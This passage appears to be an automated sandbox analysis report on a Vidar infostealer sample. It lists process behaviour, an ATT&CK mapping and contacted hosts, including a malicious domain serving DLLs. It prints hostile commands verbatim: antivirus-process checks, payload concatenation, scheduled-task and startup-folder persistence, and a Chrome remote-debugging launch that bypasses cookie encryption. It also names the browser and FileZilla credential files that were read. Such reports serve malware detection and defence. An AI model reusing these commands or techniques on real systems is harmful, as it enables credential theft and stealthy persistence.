Source: C:\Users\user\AppData\Local\SkySync Technologies\SkySync.scr	Dropped PE file which has not been started: C:\ProgramData\freebl3.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\SkySync Technologies\SkySync.scr	Dropped PE file which has not been started: C:\ProgramData\softokn3.dll	Jump to dropped file

Source: C:\Users\user\AppData\Local\SkySync Technologies\SkySync.scr

API coverage: 4.7 %

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Users\user\AppData\Local\SkySync Technologies\SkySync.scr

File Volume queried: C:\ FullSizeInformation

Source: C:\Users\user\Desktop\JHPvqMzKbz.exe	Code function: 0_2_004062D5 FindFirstFileW,FindClose,	0_2_004062D5
Source: C:\Users\user\Desktop\JHPvqMzKbz.exe	Code function: 0_2_00402E18 FindFirstFileW,	0_2_00402E18
Source: C:\Users\user\Desktop\JHPvqMzKbz.exe	Code function: 0_2_00406C9B DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,	0_2_00406C9B
Source: C:\Users\user\AppData\Local\SkySync Technologies\SkySync.scr	Code function: 19_2_00AF4005 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	19_2_00AF4005
Source: C:\Users\user\AppData\Local\SkySync Technologies\SkySync.scr	Code function: 19_2_00AFC2FF FindFirstFileW,FindNextFileW,FindClose,	19_2_00AFC2FF
Source: C:\Users\user\AppData\Local\SkySync Technologies\SkySync.scr	Code function: 19_2_00AF494A GetFileAttributesW,FindFirstFileW,FindClose,	19_2_00AF494A
Source: C:\Users\user\AppData\Local\SkySync Technologies\SkySync.scr	Code function: 19_2_00AFCD9F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,	19_2_00AFCD9F
Source: C:\Users\user\AppData\Local\SkySync Technologies\SkySync.scr	Code function: 19_2_00AFCD14 FindFirstFileW,FindClose,	19_2_00AFCD14
Source: C:\Users\user\AppData\Local\SkySync Technologies\SkySync.scr	Code function: 19_2_00AFF5D8 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	19_2_00AFF5D8
Source: C:\Users\user\AppData\Local\SkySync Technologies\SkySync.scr	Code function: 19_2_00AFF735 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	19_2_00AFF735
Source: C:\Users\user\AppData\Local\SkySync Technologies\SkySync.scr	Code function: 19_2_00AFFA36 FindFirstFileW,Sleep,FindNextFileW,FindClose,	19_2_00AFFA36
Source: C:\Users\user\AppData\Local\SkySync Technologies\SkySync.scr	Code function: 19_2_00AF3CE2 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	19_2_00AF3CE2

Source: C:\Users\user\AppData\Local\SkySync Technologies\SkySync.scr

Code function: 19_2_00AA5D13 GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,

19_2_00AA5D13

Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\Temp\646751\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\Temp\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\Temp\646751	Jump to behavior

Source: msedge.exe, 0000002F.00000002.172786275098.00000123A6591000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWMSAFD L2CAP [Bluetooth]RSVP UDPv6 Service Provider
Source: msedge.exe, 0000002F.00000003.172501117644.00007B1C01168000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: vmware.c
Source: msedge.exe, 0000002F.00000002.172787936908.00000123A90A4000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: msedge.exe, 0000001B.00000002.169646301603.0000017280C60000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 0000002C.00000002.172359478861.000001B19A417000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Users\user\AppData\Local\Temp\646751\Plates.pif

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\646751\Plates.pif

Process queried: DebugPort

Jump to behavior

Source: C:\Users\user\AppData\Local\SkySync Technologies\SkySync.scr

Code function: 19_2_00B045D5 BlockInput,

19_2_00B045D5

Source: C:\Users\user\AppData\Local\SkySync Technologies\SkySync.scr

Code function: 19_2_00AA5240 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,KiUserCallbackDispatcher,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,

19_2_00AA5240

Source: C:\Users\user\AppData\Local\SkySync Technologies\SkySync.scr

Code function: 19_2_00AC5CAC EncodePointer,EncodePointer,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,

19_2_00AC5CAC

Source: C:\Users\user\Desktop\JHPvqMzKbz.exe

Code function: 0_2_004062FC GetModuleHandleA,LoadLibraryA,GetProcAddress,

0_2_004062FC

Source: C:\Users\user\AppData\Local\SkySync Technologies\SkySync.scr

Code function: 19_2_00AE88CD GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,

19_2_00AE88CD

Source: C:\Windows\SysWOW64\tasklist.exe	Process token adjusted: Debug			Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Process token adjusted: Debug			Jump to behavior

Source: C:\Users\user\AppData\Local\SkySync Technologies\SkySync.scr	Code function: 19_2_00ABA385 SetUnhandledExceptionFilter,UnhandledExceptionFilter,		19_2_00ABA385
Source: C:\Users\user\AppData\Local\SkySync Technologies\SkySync.scr	Code function: 19_2_00ABA354 SetUnhandledExceptionFilter,		19_2_00ABA354

Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Memory allocated: page read and write | page guard

HIPS / PFW / Operating System Protection Evasion

Maps a DLL or memory area into another process

Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Section loaded: NULL target: unknown protection: readonly

Source: C:\Users\user\AppData\Local\SkySync Technologies\SkySync.scr

Code function: 19_2_00AE9369 LogonUserW,

19_2_00AE9369

Source: C:\Users\user\AppData\Local\SkySync Technologies\SkySync.scr

Code function: 19_2_00AA5240 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,KiUserCallbackDispatcher,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,

19_2_00AA5240

Source: C:\Users\user\AppData\Local\SkySync Technologies\SkySync.scr

Code function: 19_2_00AF1AC6 SendInput,keybd_event,

19_2_00AF1AC6

Source: C:\Users\user\AppData\Local\SkySync Technologies\SkySync.scr

Code function: 19_2_00AF51E2 mouse_event,

19_2_00AF51E2

Source: C:\Users\user\Desktop\JHPvqMzKbz.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c copy Treat Treat.bat & Treat.bat	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "wrsa opssvc"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr -I "avastui avgui bdservicehost nswscsvc sophoshealth"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c md 646751	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /V "AffiliateRobotsJoinedNewsletter" Purse	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Suitable + ..\Johnson + ..\July + ..\Firmware + ..\Invalid + ..\Baby + ..\Bar + ..\Continental + ..\Ruled + ..\Gay + ..\Hop + ..\Clearance + ..\Wisdom + ..\January + ..\Denmark + ..\Bull c	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\646751\Plates.pif Plates.pif c	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe /create /tn "Enjoy" /tr "wscript //B 'C:\Users\user\AppData\Local\SkySync Technologies\SkySync.js'" /sc minute /mo 5 /F	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process created: C:\Users\user\AppData\Local\SkySync Technologies\SkySync.scr "C:\Users\user\AppData\Local\SkySync Technologies\SkySync.scr" "C:\Users\user\AppData\Local\SkySync Technologies\e"	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process created: C:\Users\user\AppData\Local\SkySync Technologies\SkySync.scr "C:\Users\user\AppData\Local\SkySync Technologies\SkySync.scr" "C:\Users\user\AppData\Local\SkySync Technologies\e"
Source: C:\Windows\System32\wscript.exe	Process created: C:\Users\user\AppData\Local\SkySync Technologies\SkySync.scr "C:\Users\user\AppData\Local\SkySync Technologies\SkySync.scr" "C:\Users\user\AppData\Local\SkySync Technologies\e"
Source: C:\Users\user\AppData\Local\SkySync Technologies\SkySync.scr	Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe /create /tn "Enjoy" /tr "wscript //B 'C:\Users\user\AppData\Local\SkySync Technologies\SkySync.js'" /sc minute /mo 5 /F

Source: C:\Users\user\AppData\Local\Temp\646751\Plates.pif	Process created: C:\Windows\SysWOW64\cmd.exe cmd /k echo [internetshortcut] > "c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\skysync.url" & echo url="c:\users\user\appdata\local\skysync technologies\skysync.js" >> "c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\skysync.url" & exit
Source: C:\Users\user\AppData\Local\Temp\646751\Plates.pif	Process created: C:\Windows\SysWOW64\cmd.exe cmd /k echo [internetshortcut] > "c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\skysync.url" & echo url="c:\users\user\appdata\local\skysync technologies\skysync.js" >> "c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\skysync.url" & exit			Jump to behavior

Source: C:\Users\user\AppData\Local\SkySync Technologies\SkySync.scr

19_2_00AE88CD

Source: C:\Users\user\AppData\Local\SkySync Technologies\SkySync.scr

Code function: 19_2_00AF4F1C AllocateAndInitializeSid,CheckTokenMembership,FreeSid,

19_2_00AF4F1C

Source: JHPvqMzKbz.exe, 00000000.00000003.168178958911.0000000002B48000.00000004.00000020.00020000.00000000.sdmp, Plates.pif, 0000000B.00000000.168213904604.0000000000BE6000.00000002.00000001.01000000.00000006.sdmp, Plates.pif, 0000000B.00000003.168223388127.00000000044EA000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Run Script:AutoIt script files (.au3, .a3x).au3;.a3xAll files (.).au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
Source: SkySync.scr	Binary or memory string: Shell_TrayWnd

Source: C:\Users\user\AppData\Local\SkySync Technologies\SkySync.scr

Code function: 19_2_00AB885B cpuid

19_2_00AB885B

Source: C:\Users\user\AppData\Local\Temp\646751\Plates.pif	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\646751\Plates.pif	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\SkySync Technologies\SkySync.scr	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\SkySync Technologies\SkySync.scr	Queries volume information: C:\ VolumeInformation

Source: C:\Users\user\AppData\Local\SkySync Technologies\SkySync.scr

Code function: 19_2_00AD0030 GetLocalTime,

19_2_00AD0030

Source: C:\Users\user\AppData\Local\SkySync Technologies\SkySync.scr

Code function: 19_2_00AD0722 GetUserNameW,

19_2_00AD0722

Source: C:\Users\user\AppData\Local\SkySync Technologies\SkySync.scr

Code function: 19_2_00AC416A GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,

19_2_00AC416A

Source: C:\Users\user\Desktop\JHPvqMzKbz.exe

Code function: 0_2_00406805 GetVersion,GetSystemDirectoryW,GetWindowsDirectoryW,SHGetSpecialFolderLocation,SHGetPathFromIDListW,CoTaskMemFree,lstrcatW,lstrlenW,

0_2_00406805

Source: C:\Windows\System32\wscript.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\646751\Plates.pif	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * From AntiVirusProduct
Source: C:\Users\user\AppData\Local\SkySync Technologies\SkySync.scr	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * From AntiVirusProduct

Stealing of Sensitive Information

Yara detected Vidar

Source: Yara match

File source: sslproxydump.pcap, type: PCAP

Yara detected Vidar stealer

Source: Yara match

File source: sslproxydump.pcap, type: PCAP

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\AppData\Local\SkySync Technologies\SkySync.scr	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\ol7uiqa8.default-release\prefs.js
Source: C:\Users\user\AppData\Local\SkySync Technologies\SkySync.scr	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\ol7uiqa8.default-release\cookies.sqlite
Source: C:\Users\user\AppData\Local\SkySync Technologies\SkySync.scr	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\ol7uiqa8.default-release\places.sqlite
Source: C:\Users\user\AppData\Local\SkySync Technologies\SkySync.scr	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Users\user\AppData\Local\SkySync Technologies\SkySync.scr	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Users\user\AppData\Local\SkySync Technologies\SkySync.scr	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\AppData\Local\SkySync Technologies\SkySync.scr	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
Source: C:\Users\user\AppData\Local\SkySync Technologies\SkySync.scr	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History

Tries to harvest and steal ftp login credentials

Source: C:\Users\user\AppData\Local\SkySync Technologies\SkySync.scr

File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml

Source: SkySync.scr	Binary or memory string: WIN_81
Source: SkySync.scr	Binary or memory string: WIN_XP
Source: SkySync.scr	Binary or memory string: WIN_XPe
Source: SkySync.scr	Binary or memory string: WIN_VISTA
Source: SkySync.scr	Binary or memory string: WIN_7
Source: SkySync.scr	Binary or memory string: WIN_8
Source: SkySync.scr, 00000027.00000000.171156216310.0000000000B46000.00000002.00000001.01000000.00000009.sdmp	Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_10WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 14, 3USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte

Remote Access Functionality

Attempt to bypass Chrome Application-Bound Encryption

Source: C:\Users\user\AppData\Local\Temp\646751\Plates.pif

Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"

Yara detected Vidar

Source: Yara match

File source: sslproxydump.pcap, type: PCAP

Yara detected Vidar stealer

Source: Yara match

File source: sslproxydump.pcap, type: PCAP

Source: C:\Users\user\AppData\Local\SkySync Technologies\SkySync.scr	Code function: 19_2_00B0696E socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,		19_2_00B0696E
Source: C:\Users\user\AppData\Local\SkySync Technologies\SkySync.scr	Code function: 19_2_00B06E32 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,		19_2_00B06E32

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	111 Scripting	2 Valid Accounts	11 Windows Management Instrumentation	111 Scripting	1 Exploitation for Privilege Escalation	11 Disable or Modify Tools	2 OS Credential Dumping	2 System Time Discovery	Remote Services	1 Archive Collected Data	2 Ingress Tool Transfer	Exfiltration Over Other Network Medium	1 System Shutdown/Reboot
Credentials	Domains	Default Accounts	1 Native API	1 DLL Side-Loading	1 DLL Side-Loading	1 Deobfuscate/Decode Files or Information	21 Input Capture	1 Network Service Discovery	Remote Desktop Protocol	2 Data from Local System	11 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	1 Command and Scripting Interpreter	2 Valid Accounts	1 Extra Window Memory Injection	2 Obfuscated Files or Information	Security Account Manager	1 Account Discovery	SMB/Windows Admin Shares	21 Input Capture	1 Remote Access Software	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	1 Scheduled Task/Job	1 Scheduled Task/Job	2 Valid Accounts	1 DLL Side-Loading	NTDS	3 File and Directory Discovery	Distributed Component Object Model	3 Clipboard Data	3 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	2 Registry Run Keys / Startup Folder	21 Access Token Manipulation	1 Extra Window Memory Injection	LSA Secrets	28 System Information Discovery	SSH	Keylogging	4 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	112 Process Injection	111 Masquerading	Cached Domain Credentials	11 Query Registry	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	1 Scheduled Task/Job	2 Valid Accounts	DCSync	51 Security Software Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	2 Registry Run Keys / Startup Folder	1 Virtualization/Sandbox Evasion	Proc Filesystem	1 Virtualization/Sandbox Evasion	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	21 Access Token Manipulation	/etc/passwd and /etc/shadow	4 Process Discovery	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement
IP Addresses	Compromise Infrastructure	Supply Chain Compromise	PowerShell	Cron	Cron	112 Process Injection	Network Sniffing	1 Application Window Discovery	Shared Webroot	Local Data Staging	File Transfer Protocols	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	External Defacement
Network Security Appliances	Domains	Compromise Software Dependencies and Development Tools	AppleScript	Launchd	Launchd	Stripped Payloads	Input Capture	1 System Owner/User Discovery	Software Deployment Tools	Remote Data Staging	Mail Protocols	Exfiltration Over Unencrypted Non-C2 Protocol	Firmware Corruption

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
JHPvqMzKbz.exe	13%	ReversingLabs

Dropped Files

Source	Detection	Scanner
C:\ProgramData\chrome.dll	0%	ReversingLabs
C:\ProgramData\freebl3.dll	0%	ReversingLabs
C:\ProgramData\mozglue.dll	0%	ReversingLabs
C:\ProgramData\msvcp140.dll	0%	ReversingLabs
C:\ProgramData\nss3.dll	0%	ReversingLabs
C:\ProgramData\softokn3.dll	0%	ReversingLabs
C:\ProgramData\vcruntime140.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\SkySync Technologies\SkySync.scr	5%	ReversingLabs
C:\Users\user\AppData\Local\Temp\646751\Plates.pif	5%	ReversingLabs

Name	IP	Active	Malicious	Reputation
chrome.cloudflare-dns.com	172.64.41.3	true	false	unknown
nydc1.outbrain.org	64.202.112.31	true	false	unknown
cm.mgid.com	104.19.131.76	true	false	unknown
hbx.media.net	23.199.48.23	true	false	unknown
t.me	149.154.167.99	true	false	unknown
us-east-eb2.3lift.com	52.223.22.214	true	false	unknown
lb-sin.mgid.com	172.241.51.69	true	false	unknown
trace.popin.cc	35.213.89.133	true	false	unknown
trace.mediago.io	35.208.249.213	true	false	unknown
dualstack.tls13.taboola.map.fastly.net	151.101.1.44	true	false	unknown
dns.quad9.net	9.9.9.9	true	false	unknown
sb.scorecardresearch.com	108.139.47.92	true	false	unknown
ds-pr-bh.ybp.gysm.yahoodns.net	107.23.5.106	true	false	unknown
www.google.com	142.251.40.132	true	false	unknown
m.anycast.adnxs.com	68.67.179.153	true	false	unknown
visitor-usa02.omnitagjs.com	195.244.31.11	true	false	unknown
ib.anycast.adnxs.com	68.67.179.155	true	false	unknown
tavukdun.website	188.245.203.37	true	true	unknown
r.msftstatic.com	unknown	unknown	true	unknown
sync.inmobi.com	unknown	unknown	true	unknown
c.msn.com	unknown	unknown	true	unknown
srtb.msn.com	unknown	unknown	true	unknown
deff.nelreports.net	unknown	unknown	true	unknown
ntp.msn.com	unknown	unknown	true	unknown
ecn.dev.virtualearth.net	unknown	unknown	true	unknown
sync.outbrain.com	unknown	unknown	true	unknown
browser.events.data.msn.com	unknown	unknown	true	unknown
visitor.omnitagjs.com	unknown	unknown	true	unknown
pr-bh.ybp.yahoo.com	unknown	unknown	true	unknown
assets.msn.com	unknown	unknown	true	unknown
code.yengo.com	unknown	unknown	true	unknown
trc.taboola.com	unknown	unknown	true	unknown
px.ads.linkedin.com	unknown	unknown	true	unknown
m.adnxs.com	unknown	unknown	true	unknown
oknYaGWfCKieeGw.oknYaGWfCKieeGw	unknown	unknown	true	unknown
ib.adnxs.com	unknown	unknown	true	unknown
api.msn.com	unknown	unknown	true	unknown
eb2.3lift.com	unknown	unknown	true	unknown

Contacted URLs

Name	Malicious	Reputation
https://tavukdun.website/freebl3.dll	true	unknown
https://pr-bh.ybp.yahoo.com/sync/msn?gdpr=0&gdpr_consent=	false	unknown
https://m.adnxs.com/bounce?%2Fseg%3Fadd%3D5159620%26redir%3Dhttps%253A%252F%252Fib.adnxs.com%252Fsetuid%253Fentity%253D483%2526code%253D172DCF8F4EDA69E736C3DAA54F2A68BD%2526gdpr%253D0%2526gdpr_consent%253D	false	unknown
https://www.google.com/sorry/index?continue=https://www.google.com/async/newtab_promos&q=EgS_YJblGKnjlLkGIjDB6F_TrQLAFE94iLL1B0qdDbD51oL79FFvSN9QFQfLnCWSC8OP7uiCV5bxKOdNrPsyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM	false	unknown
https://tavukdun.website/mozglue.dll	true	unknown
https://hbx.media.net/cksync.php?type=nms&cs=3&ovsid=1537FB4C2D6A69131BC6EE662C9A68C5&gdpr=0&gdpr_consent=	false	unknown
https://tavukdun.website/msvcp140.dll	true	unknown
https://www.google.com/complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw	false	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Reputation
https://clients3.google.com/cast/chromecast/home/wallpaper/image?rt=b	chrome.exe, 0000002C.00000002.172373177537.00000C640088C000.00000004.00000800.00020000.00000000.sdmp	false	unknown
https://www.google.com/chrome/?&brand=CHWL&utm_campaign=en&utm_source=en-et-na-us-chrome-bubble&utm_	chrome.exe, 0000002C.00000002.172368575281.00000C6400030000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000002.172380279212.00000C640129C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000002.172374513342.00000C6400A3C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000003.172272815679.00000C640115F000.00000004.00000800.00020000.00000000.sdmp	false	unknown
https://dl.packetstormsecurity.net/Crackers/bios/BIOS320.EXE	chrome.exe, 0000002C.00000002.172379748982.00000C6401220000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000002.172382836385.00000C6401584000.00000004.00000800.00020000.00000000.sdmp	false	unknown
https://blog.google/products/chrome/google-chrome-safe-browsing-real-time/	chrome.exe, 0000002C.00000002.172374409051.00000C6400A04000.00000004.00000800.00020000.00000000.sdmp	false	unknown
https://shop.advanceautoparts.com/web/OrderItemDisplay	chrome.exe, 0000002C.00000002.172374066758.00000C64009A8000.00000004.00000800.00020000.00000000.sdmp	false	unknown
http://dns-tunnel-check.googlezip.net/connect	chrome.exe, 0000002C.00000002.172381459953.00000C6401414000.00000004.00000800.00020000.00000000.sdmp	false	unknown
http://polymer.github.io/AUTHORS.txt	chrome.exe, 00000017.00000003.169458748571.00000D7400510000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000017.00000003.169456103057.00000D7401658000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000017.00000003.169456234176.00000D7400544000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000017.00000003.169458953896.00000D74017C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000017.00000003.169456463692.00000D7401684000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000017.00000003.169459052596.00000D7400604000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000017.00000003.169455938436.00000D740162C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000017.00000003.169458834362.00000D7400544000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000003.172278431909.00000C6401804000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000003.172278073543.00000C640050C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000003.172275694599.00000C64016A0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000003.172278265359.00000C6400540000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000003.172276487178.00000C64016F8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000003.172278586768.00000C6400604000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000003.172275917029.00000C64016CC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000003.172276131140.00000C6400540000.00000004.00000800.00020000.00000000.sdmp	false	unknown
https://www.google.com/speech-api/v2/synthesize?	chrome.exe, 00000017.00000003.169455820763.00000D74015D4000.00000004.00000800.00020000.00000000.sdmp	false	unknown
https://www.zappos.com/cart	chrome.exe, 0000002C.00000002.172374136020.00000C64009C4000.00000004.00000800.00020000.00000000.sdmp	false	unknown
https://www.guitarcenter.com/cart	chrome.exe, 0000002C.00000002.172374136020.00000C64009C4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000002.172372822256.00000C6400810000.00000004.00000800.00020000.00000000.sdmp	false	unknown
http://unisolated.invalid/	chrome.exe, 0000002C.00000002.172377176817.00000C6400DD4000.00000004.00000800.00020000.00000000.sdmp	false	unknown
